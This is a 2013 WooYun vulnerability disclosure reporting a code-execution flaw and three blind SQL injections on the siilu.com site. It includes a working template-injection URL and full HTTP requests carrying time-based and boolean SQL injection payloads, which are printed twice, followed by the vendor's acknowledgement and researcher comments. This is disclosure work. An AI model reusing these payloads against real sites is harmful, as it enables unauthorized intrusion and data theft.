亿邦动力网某网站代码执行漏洞和SQL盲注

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-020097

漏洞标题：亿邦动力网某网站代码执行漏洞和SQL盲注

漏洞作者： lucky

提交时间：2013-03-15 14:35

修复时间：2013-04-29 14:36

公开时间：2013-04-29 14:36

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-03-15：细节已通知厂商并且等待厂商处理中
2013-03-19：厂商已经确认，细节仅向厂商公开
2013-03-29：细节向核心白帽子及相关领域专家公开
2013-04-08：细节向普通白帽子公开
2013-04-18：细节向实习白帽子公开
2013-04-29：细节向公众公开

简要描述：

亿邦动力网某网站代码执行漏洞

详细说明：

代码执行漏洞：

http://www.siilu.com//shop/100501/infocase/%24%7b%40print(md5(admin))%7d

SQL盲注3枚：

POST /companyuser/dob2b HTTP/1.1
Content-Length: 1540
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FBRHYGUKBC
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IXNSIQEDQH
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="city"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="company_site"
Acunetix
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="mail"
sample@email.tst
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass2"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass_word"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone1"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="province"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="qq"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="telphone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="usertype"
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="user_name"
kgoyghag' or (sleep(2)+1) limit 1 -- 
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="__hash__"
54c0fa6632d2db7653113cafae62bb45
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="logo"; filename=""
Content-Type: 
-------AcunetixBoundary_IXNSIQEDQH--

http://www.siilu.com/index/clue?clueid=-1%20or%2011=11

GET /product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

GET /ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

漏洞证明：

代码执行漏洞：

http://www.siilu.com//shop/100501/infocase/%24%7b%40print(md5(admin))%7d

SQL盲注3枚：

POST /companyuser/dob2b HTTP/1.1
Content-Length: 1540
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FBRHYGUKBC
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IXNSIQEDQH
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="city"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="company_site"
Acunetix
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="mail"
sample@email.tst
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass2"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass_word"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone1"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="province"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="qq"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="telphone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="usertype"
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="user_name"
kgoyghag' or (sleep(2)+1) limit 1 -- 
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="__hash__"
54c0fa6632d2db7653113cafae62bb45
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="logo"; filename=""
Content-Type: 
-------AcunetixBoundary_IXNSIQEDQH--

http://www.siilu.com/index/clue?clueid=-1%20or%2011=11

GET /product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

GET /ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

修复方案：

版权声明：转载请注明来源 lucky@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2013-03-19 12:58

厂商回复：

感谢lucky

漏洞评价：

2013-03-16 11:30 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

有两个都不审核了。后面看见有三个严重问题现在都懒得提交了，免得又不审核浪费感情啊
2013-03-17 13:19 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

@wefgod 好好留着，等厂商有确认了！再提交呵呵！
2013-03-18 10:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@lucky 是乌云这不审核···不是长沙不确认。
2013-03-18 10:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

厂商，打错字了，纠结的拼音啊
2013-03-18 10:46 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

@wefgod 了解！我也有在审核的，一直不过！纠结！哎。。。。
2013-03-18 15:39 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@lucky 一般过3天5天的，审核的可能性就基本没了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-020097

漏洞标题：亿邦动力网某网站代码执行漏洞和SQL盲注

相关厂商：亿邦动力网

漏洞作者： lucky

提交时间：2013-03-15 14:35

修复时间：2013-04-29 14:36

公开时间：2013-04-29 14:36

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lucky@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-020097

漏洞标题：亿邦动力网某网站代码执行漏洞和SQL盲注

相关厂商：亿邦动力网

漏洞作者： lucky

提交时间：2013-03-15 14:35

修复时间：2013-04-29 14:36

公开时间：2013-04-29 14:36

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-020097"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lucky@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：